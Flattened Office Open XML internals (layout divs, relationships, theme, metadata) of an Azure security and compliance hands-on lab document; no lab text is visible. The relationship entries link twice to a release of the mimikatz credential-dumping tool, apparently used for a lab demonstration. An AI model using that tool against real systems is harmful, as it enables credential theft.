        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="65156850">
          <w:marLeft w:val="403"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="92"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1886408831">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="239171181">
          <w:marLeft w:val="173"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="448011652">
          <w:marLeft w:val="173"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1189417727">
          <w:marLeft w:val="173"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1905528639">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1906916909">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1939294702">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1955404426">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1965305073">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="305361971">
          <w:marLeft w:val="720"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="859860412">
          <w:marLeft w:val="720"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="970093780">
          <w:marLeft w:val="720"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="983510152">
          <w:marLeft w:val="720"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1004170387">
          <w:marLeft w:val="720"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1427385246">
          <w:marLeft w:val="720"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1435521060">
          <w:marLeft w:val="720"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1485045886">
          <w:marLeft w:val="720"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1850362538">
          <w:marLeft w:val="720"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1863400069">
          <w:marLeft w:val="720"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1970932029">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="104010660">
          <w:marLeft w:val="547"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="120"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="260644491">
          <w:marLeft w:val="547"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="120"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="300884805">
          <w:marLeft w:val="547"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="120"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1970012560">
          <w:marLeft w:val="547"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="120"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1982148126">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1984654060">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1549612883">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1319186798">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="814681318">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="1608583303">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="1668286847">
                          <w:marLeft w:val="0"/>
                          <w:marRight w:val="0"/>
                          <w:marTop w:val="0"/>
                          <w:marBottom w:val="0"/>
                          <w:divBdr>
                            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                          </w:divBdr>
                          <w:divsChild>
                            <w:div w:id="281039070">
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="300"/>
                              <w:marBottom w:val="225"/>
                              <w:divBdr>
                                <w:top w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
                                <w:left w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
                                <w:bottom w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
                                <w:right w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
                              </w:divBdr>
                              <w:divsChild>
                                <w:div w:id="84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200263">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1861776415">
          <w:marLeft w:val="1166"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="160"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="2051879875">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2077707414">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2108888433">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2110350752">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2144342199">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="163129924">
          <w:marLeft w:val="547"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="216283388">
          <w:marLeft w:val="547"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1014570544">
          <w:marLeft w:val="547"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1250893286">
          <w:marLeft w:val="547"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1543639740">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file://csi-td11-dc1" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.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portal.azure.com"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icrosoft.com/en-us/legal/intellectualproperty/Trademarks/Usage/General.aspx"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github.com/gentilkiwi/mimikatz/releases/tag/2.2.0-20200519" TargetMode="External"/><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github.com/gentilkiwi/mimikatz/releases/tag/2.2.0-20200519" TargetMode="External"/><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eader" Target="header4.xml"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId8"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S Word Template">
  <a:themeElements>
    <a:clrScheme name="MS Blue &amp; Magenta">
      <a:dk1>
        <a:srgbClr val="353535"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="002050"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="EAEAEA"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="0078D7"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="002050"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="00BCF2"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="B4009E"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="737373"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="E6E6E6"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="0078D7"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="0078D7"/>
      </a:folHlink>
    </a:clrScheme>
    <a:fontScheme name="MICROSOFT">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36626226E27B74892394EFBDF922767" ma:contentTypeVersion="2" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="152570cd3fc9b8a13f8562978e27c845">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="517b36ea-b140-47be-8d07-387acfc90838" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="fb42bc1207acbf64cdd6bca3047c1efa" ns2:_="">
    <xsd:import namespace="517b36ea-b140-47be-8d07-387acfc90838"/>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b36ea-b140-47be-8d07-387acfc908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FDB4AD-999D-4224-97C5-DE28500249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1276EA8-E762-4514-B511-6B01E6F16502}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{03061E71-C805-4E45-BAE4-4E717A864F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b36ea-b140-47be-8d07-387acfc908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864DF7-E448-4F21-B120-A80D9A160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1832</Words>
  <Characters>10076</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>83</Lines>
  <Paragraphs>23</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>11885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Hands-on lab step-by step - Azure security privacy and compliance</dc:title>
  <dc:subject/>
  <dc:creator/>
  <cp:keywords>cloud workshop</cp:keywords>
  <cp:lastModifiedBy/>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-06-14T05:44:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-06-26T12:43:00Z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Application">
    <vt:lpwstr>Microsoft Azure Information Protection</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="Sensitivity">
    <vt:lpwstr>General</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="MSIP_Label_f42aa342-8706-4288-bd11-ebb85995028c_Enabled">
    <vt:lpwstr>True</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Extended_MSFT_Method">
    <vt:lpwstr>Automatic</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="7" name="ContentTypeId">
    <vt:lpwstr>0x010100536626226E27B74892394EFBDF922767</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="8" name="MSIP_Label_f42aa342-8706-4288-bd11-ebb85995028c_Owner">
    <vt:lpwstr>hopero@microsoft.com</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="9" name="MSIP_Label_f42aa342-8706-4288-bd11-ebb85995028c_SetDate">
    <vt:lpwstr>2017-09-20T13:50:49.1346427-07:00</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="10" name="MSIP_Label_f42aa342-8706-4288-bd11-ebb85995028c_SiteId">
    <vt:lpwstr>72f988bf-86f1-41af-91ab-2d7cd011db47</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="11" name="MSIP_Label_f42aa342-8706-4288-bd11-ebb85995028c_Name">
    <vt:lpwstr>General</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="12" name="_dlc_policyId">
    <vt:lpwstr>0x0101000E4CB7077FEE4FF7AE86D4A500EEC780030016C849C62B10EB41ACA8C7EEDEF40BB2006A83F15B98C1FD4E8D76F6993277120D|-2104630519</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="13" name="ItemRetentionFormula">
    <vt:lpwstr>&lt;formula id="Microsoft.Office.RecordsManagement.PolicyFeatures.Expiration.Formula.BuiltIn"&gt;&lt;number&gt;0&lt;/number&gt;&lt;property&gt;Expire_x005f_x0020_Review&lt;/property&gt;&lt;propertyId&gt;4efb7b69-53dd-4711-a372-96a7c80c7a38&lt;/propertyId&gt;&lt;period&gt;days&lt;/period&gt;&lt;/formula&gt;</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="14" name="_dlc_DocIdItemGuid">
    <vt:lpwstr>8de7a559-5816-4d18-b1e6-7d31e74bb5a6</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="15" name="TaxKeyword">
    <vt:lpwstr>2280;#cloud workshop|7787aea4-7979-4bdc-8492-8e29fd929eb2</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="16" name="Region">
    <vt:lpwstr/>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="17" name="Confidentiality">
    <vt:lpwstr>14;#customer ready|8986c41d-21c5-4f8f-8a12-ea4625b46858</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="18" name="ItemType">
